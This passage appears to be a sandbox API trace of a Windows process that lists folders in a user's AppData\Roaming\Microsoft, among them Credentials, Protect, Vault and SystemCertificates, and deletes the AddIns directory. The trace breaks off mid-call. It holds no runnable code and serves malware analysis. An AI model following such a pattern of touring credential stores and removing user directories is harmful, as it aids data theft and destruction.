ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.106] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0309.107] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0309.107] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0309.107] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0309.107] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0309.107] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0309.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0309.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0309.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0309.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0309.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0309.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling", cAlternateFileName="")) returned 1 [0309.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0309.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0309.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0309.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0309.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0309.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.110] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0309.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0309.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.110] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0309.110] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", lpFilePart=0x0) returned 0x37 [0309.110] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.111] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.111] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0309.112] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.112] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0309.112] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", lpFilePart=0x0) returned 0x37 [0309.112] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.113] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.113] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0309.113] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.113] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x1aeccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0309.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af118) returned 1 [0309.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\addins"), fInfoLevelId=0x0, lpFileInformation=0x1af198 | out: lpFileInformation=0x1af198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af114) returned 1 [0309.114] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\addins")) returned 1 [0309.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.115] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0309.115] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpFilePart=0x0) returned 0x3d [0309.115] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.115] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.115] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0309.116] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0309.116] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.116] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0309.116] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpFilePart=0x0) returned 0x3d [0309.116] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0309.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.117] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0309.117] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpFilePart=0x0) returned 0x42 [0309.124] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpFilePart=0x0) returned 0x43 [0309.124] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.212] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0309.213] FindNextFileW (in: hFindFile=0x737a28, 